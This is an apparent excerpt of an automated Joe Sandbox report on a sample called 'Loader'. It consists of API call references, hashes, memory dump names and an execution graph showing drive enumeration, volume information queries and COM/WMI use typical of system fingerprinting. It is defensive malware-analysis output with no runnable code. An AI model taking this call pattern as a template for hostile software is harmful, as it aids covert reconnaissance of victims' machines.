                                                                                                  • Instruction ID: 33387d79178d9c3ad1c586126cf16f650e367a39d1042aebe00a7adf46aad2ec
                                                                                                  • Opcode Fuzzy Hash: e10a5a51f28701f78bf7e41e0eca4375edc549aa650e94c600aeb0afa70d0404
                                                                                                  • Instruction Fuzzy Hash: 6421A571604215AFDB20AF75DC81A6BB7ADEF85364F104915F96AD71A1EB31EC00CFA0
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 009432B6
                                                                                                    • Part of subcall function 0093C111: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0093D985,?,00000000,-00000008), ref: 0093C172
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009432EE
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0094330E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: 62d89181b83b5d235b284de4c942acb28a3dca1c5f54682214a98e155750a1a6
                                                                                                  • Instruction ID: 41a4595ecfc9e720995d3f6e2b072a6fea47703926f2ccbf0625e367ded0dea8
                                                                                                  • Opcode Fuzzy Hash: 62d89181b83b5d235b284de4c942acb28a3dca1c5f54682214a98e155750a1a6
                                                                                                  • Instruction Fuzzy Hash: C11145F16056157FAB212BB29C8ADBF7E6CCED6399B904424F641D2101FF24EE009BB1
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 0092E989
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0092E993
                                                                                                  • int.LIBCPMT ref: 0092E9AA
                                                                                                    • Part of subcall function 0092C2D5: std::_Lockit::_Lockit.LIBCPMT ref: 0092C2E6
                                                                                                    • Part of subcall function 0092C2D5: std::_Lockit::~_Lockit.LIBCPMT ref: 0092C300
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0092EA04
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                  • String ID:
                                                                                                  • API String ID: 1383202999-0
                                                                                                  • Opcode ID: 01f7201e74d0b82d62706585314578caacc38f9d9b531afbec423903d37ace7d
                                                                                                  • Instruction ID: 84f2fb83fda30446fb1fa28018b43a6c3715661be23b74976670711cb7046a84
                                                                                                  • Opcode Fuzzy Hash: 01f7201e74d0b82d62706585314578caacc38f9d9b531afbec423903d37ace7d
                                                                                                  • Instruction Fuzzy Hash: 7811ED728002358FCB05EBA4E9A5BAD77B6BF90320F250418F8156B289DF749E00CB91
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0094A3DF,00000000,00000001,00000000,?,?,00944480,?,00000000,00000000), ref: 0094AEA7
                                                                                                  • GetLastError.KERNEL32(?,0094A3DF,00000000,00000001,00000000,?,?,00944480,?,00000000,00000000,?,?,?,00943DC6,00000000), ref: 0094AEB3
                                                                                                    • Part of subcall function 0094AF10: CloseHandle.KERNEL32(FFFFFFFE,0094AEC3,?,0094A3DF,00000000,00000001,00000000,?,?,00944480,?,00000000,00000000,?,?), ref: 0094AF20
                                                                                                  • ___initconout.LIBCMT ref: 0094AEC3
                                                                                                    • Part of subcall function 0094AEE5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0094AE81,0094A3CC,?,?,00944480,?,00000000,00000000,?), ref: 0094AEF8
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0094A3DF,00000000,00000001,00000000,?,?,00944480,?,00000000,00000000,?), ref: 0094AED8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: ed8ca2dc6f5392c3f25ffe23e80e3b94c2ce5163f016589875877322f9e82445
                                                                                                  • Instruction ID: 41d09c2cf95021f2bc57d796832f3168af6f230d67d79393fa5daf8ca8e324af
                                                                                                  • Opcode Fuzzy Hash: ed8ca2dc6f5392c3f25ffe23e80e3b94c2ce5163f016589875877322f9e82445
                                                                                                  • Instruction Fuzzy Hash: 85F09E36554258BBDF525F96DC04E9A3E26EB487A1F444410FA1896170DA328860AB91
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 009305F7
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00930606
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0093060F
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0093061C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: f01fbf2fabefbadf7a575f6d79e40c42a174d9211ef25de9454a446d1bafd095
                                                                                                  • Instruction ID: 578595d6422933853c2e9bc90b2a748a4a68ab1753254dd67553cc8a4863716e
                                                                                                  • Opcode Fuzzy Hash: f01fbf2fabefbadf7a575f6d79e40c42a174d9211ef25de9454a446d1bafd095
                                                                                                  • Instruction Fuzzy Hash: 99F06274D1420DEBCB00DBB5DA4999EBBF4FF1C205B918996A452E7150EB30AB44DF50
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(00000000,?,0093E67D), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000,?,?,00000028,00938453), ref: 0093C300
                                                                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00935CC5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00940B25
                                                                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00935CC5,?,?,?,00000055,?,-00000050,?,?), ref: 00940B5C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                                  • String ID: utf8
                                                                                                  • API String ID: 943130320-905460609
                                                                                                  • Opcode ID: 61f542abff77affe2148226b0fb1643d55d9741872a5a34af4280761e46d1034
                                                                                                  • Instruction ID: e61426edbcb9d857171865d118092989e59b15decf37fa564893cbf7e83e02cb
                                                                                                  • Opcode Fuzzy Hash: 61f542abff77affe2148226b0fb1643d55d9741872a5a34af4280761e46d1034
                                                                                                  • Instruction Fuzzy Hash: C3510771A00705EADB28AB718C86FA773ACEFC4705F150629FB999B081E670D980C768
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Release_chore.LIBCPMT ref: 009276C6
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00927701
                                                                                                    • Part of subcall function 0092B0D7: CreateThreadpoolWork.KERNEL32(0092B200,00928BCA,00000000,00000000,?,00928BCA,?,?,?,?), ref: 0092B0E6
                                                                                                    • Part of subcall function 0092B0D7: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0092B0F3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                  • String ID: Fail to schedule the chore!
                                                                                                  • API String ID: 3683891980-3313369819
                                                                                                  • Opcode ID: 9792c80dd348801eecd007fc93f1f96c7dc5ba6b8aba2c4f940e811e9f168d88
                                                                                                  • Instruction ID: 2c8c67c923f8abea63e0c5acba1199876ab9ae048cb9026db5880797b8346bfe
                                                                                                  • Opcode Fuzzy Hash: 9792c80dd348801eecd007fc93f1f96c7dc5ba6b8aba2c4f940e811e9f168d88
                                                                                                  • Instruction Fuzzy Hash: DF51CCB1D013289FCB00DF94E895BAEBBB4FF88314F144129E8196B391D776AA05CF91
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0093B983,?,?,00000000,00000000,00000000,?), ref: 0093BAA7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                  • Opcode ID: 4e6b1278c7bc1c3d829e8b879d36e6f657bb1c67b895d14ab7340f453aba3e98
                                                                                                  • Instruction ID: 8754b042d05c3489bf7e02cc43a8e8b2cfffb5147f530bd7ec9fee8c65888da6
                                                                                                  • Opcode Fuzzy Hash: 4e6b1278c7bc1c3d829e8b879d36e6f657bb1c67b895d14ab7340f453aba3e98
                                                                                                  • Instruction Fuzzy Hash: 87415871900209AFCF15DF98CC81AEEBBB9FF88304F188199FA18A7265D7359950DF51
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00924066
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 009241A2
                                                                                                    • Part of subcall function 0092AD65: _Yarn.LIBCPMT ref: 0092AD85
                                                                                                    • Part of subcall function 0092AD65: _Yarn.LIBCPMT ref: 0092ADA9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 2070049627-1405518554
                                                                                                  • Opcode ID: 4cacefba4058a64550a9637af6f63c2dfdb8b820f03a386354149582db969436
                                                                                                  • Instruction ID: c8289a0468b655769ae5f4dea8beac2e48f9bcdf66091187f5061c700b15c386
                                                                                                  • Opcode Fuzzy Hash: 4cacefba4058a64550a9637af6f63c2dfdb8b820f03a386354149582db969436
                                                                                                  • Instruction Fuzzy Hash: 07417FF1A007559BDB10DF69E905717BBE8BF54704F044628E4099B781E3BAE518CFE2
                                                                                                  APIs
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0093B565
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___except_validate_context_record
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                  • Opcode ID: f35447e0e9121cb176504f97d0d1965c5df4eeec83a536cdc8773953517f40c4
                                                                                                  • Instruction ID: 2f05aa9b262c13c6cd326c1573758a2f8ce1a08a24b5f72f5dd8eeea09436975
                                                                                                  • Opcode Fuzzy Hash: f35447e0e9121cb176504f97d0d1965c5df4eeec83a536cdc8773953517f40c4
                                                                                                  • Instruction Fuzzy Hash: CF31E472400219DFCF269F50CC459AE7B6AFF09329F18465BFA5449122C332CCA2DF82
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0092B9A9
                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?), ref: 0092B9CE
                                                                                                    • Part of subcall function 009306FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,0092F444,00000000,?,?,?,0092F444,00923EEA,009575AC,00923EEA), ref: 0093075D
                                                                                                    • Part of subcall function 00938443: IsProcessorFeaturePresent.KERNEL32(00000017,0093387B,?,?,?,?,00000000,?,?,?,0092B69C,0092B5C9,00000000,?,?,0092B5C9), ref: 0093845F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1924019822-1018135373
                                                                                                  • Opcode ID: 81eea1150cc99281415d13fe518b6ec8939fdac3c9ec56752976c9aadca91486
                                                                                                  • Instruction ID: c1fdad9575050c7c7ab652585485c6486fc872a1e3c91a985e0ceb38f999c8ed
                                                                                                  • Opcode Fuzzy Hash: 81eea1150cc99281415d13fe518b6ec8939fdac3c9ec56752976c9aadca91486
                                                                                                  • Instruction Fuzzy Hash: 1A21BE35D0022C9BCF24DF95E946BAEB7F8EF84718F580419E605AB259CB70AD85CB81
                                                                                                  APIs
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00922853
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___std_exception_copy
                                                                                                  • String ID: bad array new length$ios_base::badbit set
                                                                                                  • API String ID: 2659868963-1158432155
                                                                                                  • Opcode ID: 996667ae5b28d0e7d63c86e348d6a810d838570aff386738151490293b2813a1
                                                                                                  • Instruction ID: 894123aaa90aa1be8cdcfc3b9e87d08cc44c5be635e49fef0655ad7d44b9f0b7
                                                                                                  • Opcode Fuzzy Hash: 996667ae5b28d0e7d63c86e348d6a810d838570aff386738151490293b2813a1
                                                                                                  • Instruction Fuzzy Hash: 7501D4F26193019BD714DF58D826B1B7BE8EF84318F00892CF4498B340E771E805CB81
                                                                                                  APIs
                                                                                                    • Part of subcall function 009306FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,0092F444,00000000,?,?,?,0092F444,00923EEA,009575AC,00923EEA), ref: 0093075D
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00922853
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise___std_exception_copy
                                                                                                  • String ID: bad array new length$ios_base::badbit set
                                                                                                  • API String ID: 3109751735-1158432155
                                                                                                  • Opcode ID: c7a12b1e71260d0ee332d3fe1af2c3ead70afa979aabf827d73fee3ca2ce7b4b
                                                                                                  • Instruction ID: 6f8afbe67d0b4a95431eee5b9a03c150ba1d54cf7cefda6945ab1cbad1ac3e03
                                                                                                  • Opcode Fuzzy Hash: c7a12b1e71260d0ee332d3fe1af2c3ead70afa979aabf827d73fee3ca2ce7b4b
                                                                                                  • Instruction Fuzzy Hash: DAF01CF1619300ABD314EF59DC16B0BBBE4EB85319F01881CF5889B301E3B5D449CB92

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.3%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:41.8%
                                                                                                  Total number of Nodes:220
                                                                                                  Total number of Limit Nodes:14
                                                                                                  execution_graph 14115 423d40 14116 423da0 14115->14116 14116->14116 14117 423df5 RtlExpandEnvironmentStrings 14116->14117 14119 423e40 14117->14119 14118 423ebd 14119->14118 14121 423e9e RtlExpandEnvironmentStrings 14119->14121 14123 423edb 14119->14123 14125 423fd1 14119->14125 14127 424157 14119->14127 14121->14118 14121->14123 14121->14125 14121->14127 14122 424141 GetLogicalDrives 14126 441da0 LdrInitializeThunk 14122->14126 14123->14123 14129 441da0 14123->14129 14125->14122 14125->14125 14125->14127 14126->14127 14128 42429d 14127->14128 14133 421b10 14127->14133 14130 441dc0 14129->14130 14132 441ece 14130->14132 14145 43eba0 LdrInitializeThunk 14130->14145 14132->14125 14146 441c20 14133->14146 14135 421b53 14142 422288 14135->14142 14150 43cac0 14135->14150 14137 421bac 14143 421c20 14137->14143 14153 43eba0 LdrInitializeThunk 14137->14153 14139 43cac0 RtlAllocateHeap 14139->14143 14141 422200 14141->14142 14155 43eba0 LdrInitializeThunk 14141->14155 14142->14128 14143->14139 14143->14141 14154 43eba0 LdrInitializeThunk 14143->14154 14145->14132 14148 441c40 14146->14148 14147 441d4e 14147->14135 14148->14147 14156 43eba0 LdrInitializeThunk 14148->14156 14157 440240 14150->14157 14152 43caca RtlAllocateHeap 14152->14137 14153->14137 14154->14143 14155->14141 14156->14147 14158 440250 14157->14158 14158->14152 14158->14158 14159 43eb40 14160 43eb58 14159->14160 14161 43eb80 14159->14161 14162 43eb7a 14159->14162 14160->14161 14164 43eb6b RtlReAllocateHeap 14160->14164 14163 43cac0 RtlAllocateHeap 14162->14163 14163->14161 14164->14161 14322 440e00 14323 440e20 14322->14323 14324 440e6e 14323->14324 14330 43eba0 LdrInitializeThunk 14323->14330 14326 43cac0 RtlAllocateHeap 14324->14326 14329 440f7f 14324->14329 14327 440f02 14326->14327 14327->14329 14331 43eba0 LdrInitializeThunk 14327->14331 14330->14324 14331->14329 14332 43f308 14333 43f330 14332->14333 14333->14333 14336 43eba0 LdrInitializeThunk 14333->14336 14335 43f394 14336->14335 14165 40cd4e 14166 40cd70 14165->14166 14169 4396a0 14166->14169 14168 40ce68 14168->14168 14170 4396d0 CoCreateInstance 14169->14170 14172 4399b9 SysAllocString 14170->14172 14173 439d5f 14170->14173 14176 439a3c 14172->14176 14175 439d6f GetVolumeInformationW 14173->14175 14184 439d91 14175->14184 14177 439a44 CoSetProxyBlanket 14176->14177 14178 439d4e SysFreeString 14176->14178 14179 439d44 14177->14179 14180 439a64 SysAllocString 14177->14180 14178->14173 14179->14178 14182 439b50 14180->14182 14182->14182 14183 439b66 SysAllocString 14182->14183 14186 439b8e 14183->14186 14184->14168 14185 439d32 SysFreeString SysFreeString 14185->14179 14186->14185 14187 439d28 14186->14187 14188 439bd6 VariantInit 14186->14188 14187->14185 14190 439c20 14188->14190 14189 439d17 VariantClear 14189->14187 14190->14189 14191 40d7cf 14192 40d7d5 14191->14192 14193 40d7df CoUninitialize 14192->14193 14194 40d800 14193->14194 14194->14194 14337 430412 CoSetProxyBlanket 14338 43f211 14339 43f213 14338->14339 14340 43f26e 14339->14340 14342 43eba0 LdrInitializeThunk 14339->14342 14340->14340 14342->14340 14343 439490 14344 4394b0 14343->14344 14346 43952e 14344->14346 14352 43eba0 LdrInitializeThunk 14344->14352 14348 4395be 14346->14348 14349 4395c0 14346->14349 14351 43eba0 LdrInitializeThunk 14346->14351 14348->14349 14353 43eba0 LdrInitializeThunk 14348->14353 14351->14348 14352->14346 14353->14349 14195 410a57 14196 410a74 14195->14196 14197 410d5c RtlExpandEnvironmentStrings 14196->14197 14199 40ec78 14196->14199 14200 410dc7 14197->14200 14200->14199 14201 415200 14200->14201 14202 415220 14201->14202 14202->14202 14203 441c20 LdrInitializeThunk 14202->14203 14204 41535d 14203->14204 14205 4155de 14204->14205 14206 41537f 14204->14206 14212 4155f2 14204->14212 14214 4153c3 14204->14214 14224 441f20 14204->14224 14205->14199 14210 41576c 14206->14210 14206->14212 14206->14214 14228 441fe0 14206->14228 14210->14199 14213 441c20 LdrInitializeThunk 14212->14213 14215 41575d 14213->14215 14214->14205 14235 43eba0 LdrInitializeThunk 14214->14235 14215->14210 14216 4157a5 